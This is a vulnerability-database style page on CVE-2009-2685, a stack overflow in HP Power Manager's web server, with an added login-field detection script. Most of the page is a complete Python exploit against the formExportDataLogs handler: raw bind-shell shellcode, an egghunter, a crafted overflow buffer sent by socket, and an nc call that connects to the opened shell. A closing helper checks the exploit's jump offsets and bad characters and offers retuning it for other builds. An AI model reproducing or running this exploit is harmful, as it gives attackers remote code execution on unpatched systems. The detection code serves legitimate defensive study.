CVE-2009-2685


A vulnerability has been found in HP Power Manager (the affected versions are not stated; the Nessus plugin cited below checks for versions prior to 4.2.10) and rated very critical. It affects unknown code in the Login Form component. Manipulation of the Login argument with crafted input leads to memory corruption. The CWE classification is CWE-119: the product performs operations on a memory buffer but can read from or write to a memory location outside the intended boundary of the buffer. The impact is on confidentiality, integrity and availability. The summary by CVE is:

Stack-based buffer overflow in the login form in the management web server in HP Power Manager allows remote attackers to execute arbitrary code via the Login variable.

The weakness was disclosed on 11/04/2009 by Janek Vind (Website); the advisory can be read at zerodayinitiative.com. The vulnerability is tracked as CVE-2009-2685. Exploitation appears to be easy: the attack can be launched remotely against the management web server and requires no authentication. Technical details and a public exploit are available. The current price estimate for an exploit is around USD 5k (calculated on 12/29/2024).

A public exploit written in Python was published immediately after the advisory and can be downloaded from securityfocus.com. It is rated highly functional. The 0-day is estimated to have been worth approximately USD 100k. The vulnerability scanner Nessus provides plugin ID 44109 (HP Power Manager < 4.2.10), assigned to the family CGI abuses, which helps determine whether a target is affected.

A mitigation was published before, not after, the disclosure of the vulnerability. The attack can also be detected and blocked with TippingPoint filter 8314.

The vulnerability is also documented in the databases at Tenable (44109), SecurityFocus (BID 36933), OSVDB (59684), SecurityTracker (ID 1023140) and Vulnerability Center (SBV-24672).
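The attack the advisory describes is an unauthenticated POST whose Login field is far longer than any real user name and carries raw machine code. The following is an added example of request-level detection logic for that shape, written for this page; it is not HP code and not part of the advisory, the Nessus plugin or the TippingPoint filter. The length threshold, the host name and the login path are assumptions, and the sample requests are constructed.

```python
from urllib.parse import quote_plus, unquote_to_bytes

# Added example, not HP code and not part of the advisory. Flags POSTs whose
# Login field is oversized or carries non-printable bytes.
MAX_LOGIN_LEN = 64     # assumption: no legitimate user name is longer than this
PARAM = "Login"        # parameter named in the CVE summary


def split_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip()
    return method.decode(), target.decode(), headers, body


def form_fields(body: bytes) -> dict:
    """Decode x-www-form-urlencoded pairs, keeping values as bytes so raw
    machine code survives instead of being mangled by a text decode."""
    fields = {}
    for pair in body.split(b"&"):
        if not pair:
            continue
        name, _, value = pair.partition(b"=")
        key = unquote_to_bytes(name.replace(b"+", b" ")).decode(errors="replace")
        fields[key] = unquote_to_bytes(value.replace(b"+", b" "))
    return fields


def inspect_request(raw: bytes):
    """Return a finding dict for a suspicious login POST, or None."""
    method, target, headers, body = split_request(raw)
    if method != "POST":
        return None
    ctype = headers.get("content-type", b"")
    if not ctype.startswith(b"application/x-www-form-urlencoded"):
        return None
    fields = form_fields(body)
    if PARAM not in fields:
        return None
    value = fields[PARAM]
    reasons = []
    if len(value) > MAX_LOGIN_LEN:
        reasons.append("%s length %d exceeds %d" % (PARAM, len(value), MAX_LOGIN_LEN))
    nonprint = sum(1 for b in value if b < 0x20 or b > 0x7E)
    if nonprint:
        reasons.append("%d non-printable bytes in %s" % (nonprint, PARAM))
    if not reasons:
        return None
    return {"target": target, "login_len": len(value),
            "nonprint": nonprint, "reasons": reasons}


def build_post(host: str, path: str, body: bytes) -> bytes:
    """Helper that frames a constructed sample POST."""
    head = ("POST %s HTTP/1.1\r\nHost: %s\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n\r\n" % (path, host, len(body)))
    return head.encode() + body


# Constructed samples. The path is an assumption; the attack body only mimics
# the attack shape (padding, NOP bytes, a short jump) and is not an exploit.
LOGIN_PATH = "/goform/formLogin"
BENIGN = build_post("pm.example", LOGIN_PATH, b"Login=admin&Password=s3cret")
ATTACK_BODY = (b"Login=" + quote_plus(b"\x41" * 500 + b"\x90" * 16 + b"\xeb\xc2").encode()
               + b"&Password=x")
ATTACK = build_post("pm.example", LOGIN_PATH, ATTACK_BODY)
GET_REQ = b"GET /Contents/login.asp HTTP/1.1\r\nHost: pm.example\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("attack", ATTACK), ("get", GET_REQ)):
        print(name, inspect_request(req))
```

Matching on the parameter name rather than on a URL path keeps the check usable when the form path is unknown, and decoding the body to bytes rather than text is what makes the non-printable count meaningful: a text decode would replace or drop the very bytes that distinguish shellcode from a user name.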

Exploit


The exploit below was found online and contains shellcode. Note that it targets the fileName parameter of the formExportDataLogs handler (the Metasploit module exploit/windows/http/hp_power_manager_filename named in its banner), not the Login variable described in the CVE summary above; confirm which flaw you are testing before using it.

Modified


#!/usr/bin/env python3
print("""
##//#############################################################################################################
##							##							#
## Vulnerability: HP Power Manager 'formExportDataLogs' ##  FormExportDataLogs Buffer Overflow	 		#
## 							##  HP Power Manager				 	#
## Vulnerable Application: HP Power Manager	 	##  This is a part of the Metasploit Module, 		#
## Tested on Windows [Version 6.1.7600] 		##  exploit/windows/http/hp_power_manager_filename	#
##							##							#
## Author: Muhammad Haidari				##  Spawns a shell to same window			#
## Contact: ghmh@outlook.com				##							#
## Website: www.github.com/muhammd			##							#
##							##							#
##//#############################################################################################################
##
##
## TODO: adjust 
##
## Usage: python3 hpm_exploit.py <Remote IP Address>
""")
import os
import sys
import time
from socket import socket, AF_INET, SOCK_STREAM
from urllib.parse import quote_plus
 
try:
    HOST = sys.argv[1]
except IndexError:
    print("Usage: %s HOST" % sys.argv[0])
    sys.exit(1)
 
PORT = 80
 
# Shellcode: windows/shell_bind_tcp listening on port 1234 (the nc call at the end connects to it).
# It is sent raw inside the Accept header, so CR/LF and the other header-breaking bytes are excluded:
#msfvenom -p windows/shell_bind_tcp LHOST=10.11.0.55 LPORT=1234  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
 
# Egg tag: the egghunter scans memory for this 8-byte marker and jumps to what follows it.
egg = b"b33fb33f"
buf = egg
buf += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x39\x8c\xb9\x94\x83\xee\xfc\xe2\xf4"
buf += b"\xc5\x64\x3b\x94\x39\x8c\xd9\x1d\xdc\xbd\x79\xf0"
buf += b"\xb2\xdc\x89\x1f\x6b\x80\x32\xc6\x2d\x07\xcb\xbc"
buf += b"\x36\x3b\xf3\xb2\x08\x73\x15\xa8\x58\xf0\xbb\xb8"
buf += b"\x19\x4d\x76\x99\x38\x4b\x5b\x66\x6b\xdb\x32\xc6"
buf += b"\x29\x07\xf3\xa8\xb2\xc0\xa8\xec\xda\xc4\xb8\x45"
buf += b"\x68\x07\xe0\xb4\x38\x5f\x32\xdd\x21\x6f\x83\xdd"
buf += b"\xb2\xb8\x32\x95\xef\xbd\x46\x38\xf8\x43\xb4\x95"
buf += b"\xfe\xb4\x59\xe1\xcf\x8f\xc4\x6c\x02\xf1\x9d\xe1"
buf += b"\xdd\xd4\x32\xcc\x1d\x8d\x6a\xf2\xb2\x80\xf2\x1f"
buf += b"\x61\x90\xb8\x47\xb2\x88\x32\x95\xe9\x05\xfd\xb0"
buf += b"\x1d\xd7\xe2\xf5\x60\xd6\xe8\x6b\xd9\xd3\xe6\xce"
buf += b"\xb2\x9e\x52\x19\x64\xe4\x8a\xa6\x39\x8c\xd1\xe3"
buf += b"\x4a\xbe\xe6\xc0\x51\xc0\xce\xb2\x3e\x73\x6c\x2c"
buf += b"\xa9\x8d\xb9\x94\x10\x48\xed\xc4\x51\xa5\x39\xff"
buf += b"\x39\x73\x6c\xfe\x31\xd5\xe9\x76\xc4\xcc\xe9\xd4"
buf += b"\x69\xe4\x53\x9b\xe6\x6c\x46\x41\xae\xe4\xbb\x94"
buf += b"\x3d\x5e\x30\x72\x53\x9c\xef\xc3\x51\x4e\x62\xa3"
buf += b"\x5e\x73\x6c\xc3\x51\x3b\x50\xac\xc6\x73\x6c\xc3"
buf += b"\x51\xf8\x55\xaf\xd8\x73\x6c\xc3\xae\xe4\xcc\xfa"
buf += b"\x74\xed\x46\x41\x51\xef\xd4\xf0\x39\x05\x5a\xc3"
buf += b"\x6e\xdb\x88\x62\x53\x9e\xe0\xc2\xdb\x71\xdf\x53"
buf += b"\x7d\xa8\x85\x95\x38\x01\xfd\xb0\x29\x4a\xb9\xd0"
buf += b"\x6d\xdc\xef\xc2\x6f\xca\xef\xda\x6f\xda\xea\xc2"
buf += b"\x51\xf5\x75\xab\xbf\x73\x6c\x1d\xd9\xc2\xef\xd2"
buf += b"\xc6\xbc\xd1\x9c\xbe\x91\xd9\x6b\xec\x37\x59\x89"
buf += b"\x13\x86\xd1\x32\xac\x31\x24\x6b\xec\xb0\xbf\xe8"
buf += b"\x33\x0c\x42\x74\x4c\x89\x02\xd3\x2a\xfe\xd6\xfe"
buf += b"\x39\xdf\x46\x41"
 
# Egghunter (the classic int 0x2e hunter) searching memory for the tag "b33f":
#tools/exploit/egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'
 
hunter = b""
hunter += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += b"\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
 
# Overflow string for the fileName parameter: padding, a NOP sled, the hunter,
# a short jump back into the sled, and the address that starts execution in the jump.
buffer = b"\x41" * (721 - len(hunter))
buffer += b"\x90" * 30 + hunter
buffer += b"\xeb\xc2\x90\x90"           # JMP SHORT -0x3e: 62 bytes back, into the NOP sled ahead of the hunter
buffer += b"\xd5\x74\x41"               # 0x004174d5: pop esi # pop ebx # ret 10 (DevManBE.exe); only the low three bytes are sent, the high byte is 0x00
 
 
content = b"dataFormat=comma&exportto=file&fileName=" + quote_plus(buffer).encode()
content += b"&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"
 
payload = b"POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += b"Host: %s\r\n" % HOST.encode()
payload += b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += b"Accept: %s\r\n" % buf      # shellcode is staged in a header; the egghunter finds it by its tag
payload += b"Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST.encode()
payload += b"Content-Type: application/x-www-form-urlencoded\r\n"
payload += b"Content-Length: %d\r\n\r\n" % len(content)
payload += content
 
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print("[+] Payload Fired... She will be back in less than a min...")
s.sendall(payload)
print("[+] Give me 30 Sec!")
time.sleep(30)
os.system("nc -nv " + HOST + " 1234")
s.close()
print("[+] Did you get your Proof.txt file?!?")
# note: if you didn't get a bind shell, you may have to bump the wait to a minute: time.sleep(60).

The exploit script above has been modified to include the payload.
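Before pointing a script like the one above at a target, a practitioner wants to confirm the arithmetic it depends on: that the short jump after the egghunter really lands in the NOP sled, where the return address sits, which tag the hunter searches for, and whether the bad-character lists quoted in its comments hold for the bytes actually sent. The following added helper, written for this page and not part of the posted script, rebuilds the fileName overflow string from the same constants and checks those points offline. One thing it surfaces: the hunter's `int 0x2e` instruction contains 0x2e ('.'), which the egghunter.rb command line lists as a bad character; because the value is URL-encoded with quote_plus before it is sent, that list only matters for whatever the server does after decoding.

```python
# Added verification helper for the exploit above; not part of the posted script.

# Bytes copied from the script: the int 0x2e egghunter and the buffer trailer.
HUNTER = bytes.fromhex(
    "6681caff0f42526a0258cd2e3c055a74efb86233336689d7af75eaaf75e7ffe7")
PAD_TOTAL = 721                 # padding and hunter share the first 721 bytes
SLED_LEN = 30                   # NOP sled placed in front of the hunter
JMP = b"\xeb\xc2\x90\x90"       # jmp short rel8 followed by two NOPs
RET = b"\xd5\x74\x41"           # low three bytes of 0x004174d5 (pop esi # pop ebx # ret 10)

# Bad-character lists quoted in the script's msfvenom and egghunter.rb comments.
# The shellcode sits in an HTTP header, so CR/LF and friends are excluded there;
# the fileName value is URL-encoded before the server decodes it.
HEADER_BADCHARS = bytes.fromhex("001a3a263f2523200a0d2f2b0b")
FORM_BADCHARS = bytes.fromhex("003a263f2523200a0d2f2b0b5c1a") + b"&=+?:;-,/#.\\$%"


def build_buffer(hunter: bytes = HUNTER) -> bytes:
    """Same layout the script builds: padding, sled, hunter, jmp, return address."""
    return (b"\x41" * (PAD_TOTAL - len(hunter)) + b"\x90" * SLED_LEN
            + hunter + JMP + RET)


def layout(hunter: bytes = HUNTER) -> dict:
    """Byte offsets of each component inside build_buffer()."""
    sled_start = PAD_TOTAL - len(hunter)
    hunter_start = sled_start + SLED_LEN
    jmp_off = hunter_start + len(hunter)
    return {"sled": (sled_start, hunter_start),
            "hunter": (hunter_start, jmp_off),
            "jmp": jmp_off,
            "ret": jmp_off + len(JMP)}


def jmp_short_target(buf: bytes, off: int) -> int:
    """Resolve a 2-byte `jmp short rel8` at off. rel8 is signed and relative
    to the byte after the instruction, so 0xC2 means 62 bytes backwards."""
    if buf[off] != 0xEB:
        raise ValueError("no jmp short at offset %d" % off)
    rel = int.from_bytes(buf[off + 1:off + 2], "little", signed=True)
    return off + 2 + rel


def jmp_lands_in_sled(hunter: bytes = HUNTER) -> bool:
    """True if the short jump after the hunter lands inside the NOP sled."""
    buf = build_buffer(hunter)
    lay = layout(hunter)
    lo, hi = lay["sled"]
    return lo <= jmp_short_target(buf, lay["jmp"]) < hi


def badchars_in(data: bytes, bad: bytes) -> list:
    """Sorted list of the bad-character values that actually occur in data."""
    return sorted(set(data) & set(bad))


def hunter_tag(hunter: bytes = HUNTER) -> bytes:
    """The 4-byte tag the egghunter compares against: the immediate of its
    `mov eax, imm32` (opcode 0xB8). The shellcode must start with it twice."""
    idx = hunter.find(b"\xb8")
    return hunter[idx + 1:idx + 5]


if __name__ == "__main__":
    buf = build_buffer()
    lay = layout()
    print("buffer length %d, return address at offset %d" % (len(buf), lay["ret"]))
    print("jmp at %d -> %d, sled %s, lands in sled: %s"
          % (lay["jmp"], jmp_short_target(buf, lay["jmp"]), lay["sled"], jmp_lands_in_sled()))
    print("egg tag searched by hunter:", hunter_tag())
    print("form bad chars present in hunter:",
          [hex(b) for b in badchars_in(HUNTER, FORM_BADCHARS)])
```

Running it prints a 758-byte buffer with the return address at offset 755 and the jump at 751 resolving to 691, two bytes into the sled that starts at 689; the same functions can be reused with a different hunter or padding count when retuning the exploit for another build.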